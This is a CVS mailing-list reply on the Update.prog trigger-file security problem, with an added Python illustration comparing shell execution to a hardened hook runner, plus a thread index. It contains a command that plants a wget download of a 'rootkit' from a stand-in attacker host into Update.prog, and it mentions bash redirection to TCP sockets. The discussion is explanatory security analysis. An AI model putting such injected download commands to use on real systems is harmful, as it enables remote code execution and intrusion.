> Update.prog just contains the name of the program to run, not the actual
> code. If you can't commit, you can't upload arbitrary code to run, you
> can only run pre-existing code on the server, and you have no control
> over its input or arguments, so it's a very low-level threat.

cat "wget ftp://ftp.hax0r.cx/rootkit" >CVS/Update.prog

Should I continue?

Only a very carefully made chroot gaol can give you some security. Just a
shell with redirections can do a lot of harm.

By the way, bash-2.04 can redirect to TCP sockets. Do you know that? Do
you have to know? Now you have.

Another question is that Update.prog may become useless after removing
"rm", "cat" and other "harmful" programs.

Regards,
Pavel Roskin
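The point of the reply above is that a trigger file which "just contains the name of the program to run" is still arbitrary command execution if that line reaches a shell. The following is an added illustration, not CVS source code and not Pavel's: it models a trigger file at CVS/Update.prog in a constructed working directory, runs its one line the dangerous way (through /bin/sh, so redirections are honoured) and the conservative way (a bare name resolved inside an assumed hook directory and executed without a shell). The hook directory, the name pattern, the "notify-hook" script and the harmless `echo pwned > marker` stand-in for the wget line are all assumptions made for this example.

```python
"""Model of a CVS/Update.prog trigger: shell execution vs. argv-only execution.

Added illustration, not CVS source. Assumes a trigger file CVS/Update.prog in a
working directory whose single line names the program to run (assumption).
"""
import os
import re
import subprocess
import tempfile

# Assumed policy: only a bare program name is allowed, so no whitespace,
# no path separators and no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+$")


def read_trigger(workdir: str) -> str:
    """Return the first line of CVS/Update.prog under workdir."""
    with open(os.path.join(workdir, "CVS", "Update.prog"), encoding="utf-8") as fh:
        return fh.readline().rstrip("\n")


def run_trigger_via_shell(workdir: str) -> int:
    """Vulnerable model: the line is handed to /bin/sh, so redirections,
    pipelines and arguments written into Update.prog are all honoured."""
    cmd = read_trigger(workdir)
    return subprocess.run(cmd, shell=True, cwd=workdir).returncode


def run_trigger_argv(workdir: str, hookdir: str) -> int:
    """Hardened model: the line must be a bare name that resolves to an
    executable inside hookdir, and it is executed without any shell."""
    name = read_trigger(workdir)
    if not SAFE_NAME.match(name):
        raise ValueError(f"Update.prog content rejected: {name!r}")
    path = os.path.join(hookdir, name)
    if not (os.path.isfile(path) and os.access(path, os.X_OK)):
        raise ValueError(f"no such hook in {hookdir}: {name!r}")
    return subprocess.run([path], cwd=workdir).returncode


def demo(trigger_line: str) -> dict:
    """Write a constructed Update.prog holding trigger_line, run it through
    both models and report whether the shell model wrote a file and what the
    argv model decided."""
    with tempfile.TemporaryDirectory() as workdir, tempfile.TemporaryDirectory() as hookdir:
        os.mkdir(os.path.join(workdir, "CVS"))
        with open(os.path.join(workdir, "CVS", "Update.prog"), "w", encoding="utf-8") as fh:
            fh.write(trigger_line + "\n")

        # Constructed legitimate hook that the hardened model is allowed to run.
        hook = os.path.join(hookdir, "notify-hook")
        with open(hook, "w", encoding="utf-8") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(hook, 0o755)

        run_trigger_via_shell(workdir)
        shell_wrote_marker = os.path.exists(os.path.join(workdir, "marker"))

        try:
            rc = run_trigger_argv(workdir, hookdir)
            argv_result = f"ran, exit {rc}"
        except ValueError as exc:
            argv_result = f"rejected: {exc}"

    return {"shell_wrote_marker": shell_wrote_marker, "argv_result": argv_result}


if __name__ == "__main__":
    # A harmless stand-in for the "wget ftp://..." line from the post.
    print(demo("echo pwned > marker"))
    print(demo("notify-hook"))
    print(demo("../notify-hook"))
```

With the redirection line the shell model leaves a file named marker in the working directory, which is exactly the "shell with redirections can do a lot of harm" case; the argv model refuses the same line because it is not a bare name, runs only the constructed notify-hook, and also refuses a relative path that tries to escape the hook directory. Removing "rm" or "cat" from the server, as the reply notes, would not change the first outcome, since the redirection is performed by the shell itself.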
- [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Karl Fogel
- Re: [akr@M17N.ORG: cvs security problem] Larry Jones
- Re: [akr@M17N.ORG: cvs security problem] Mike Castle
- Re: [akr@M17N.ORG: cvs security problem] Tanaka Akira
- Re: [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Karl Fogel
- Re: [akr@M17N.ORG: cvs security problem] Michael Richardson
- Re: [akr@M17N.ORG: cvs security problem] Pavel Roskin
- Re: [akr@M17N.ORG: cvs security problem] Larry Jones
- Re: [akr@M17N.ORG: cvs security problem] Pavel Roskin
- Re: [akr@M17N.ORG: cvs security problem] Tanaka Akira
- Re: [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Larry Jones
- Re: [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Ian Lance Taylor
- Re: [akr@M17N.ORG: cvs security problem] Michael Richardson
- Re: [akr@M17N.ORG: cvs security problem] Tanaka Akira
- Re: [akr@M17N.ORG: cvs security problem] Michael Richardson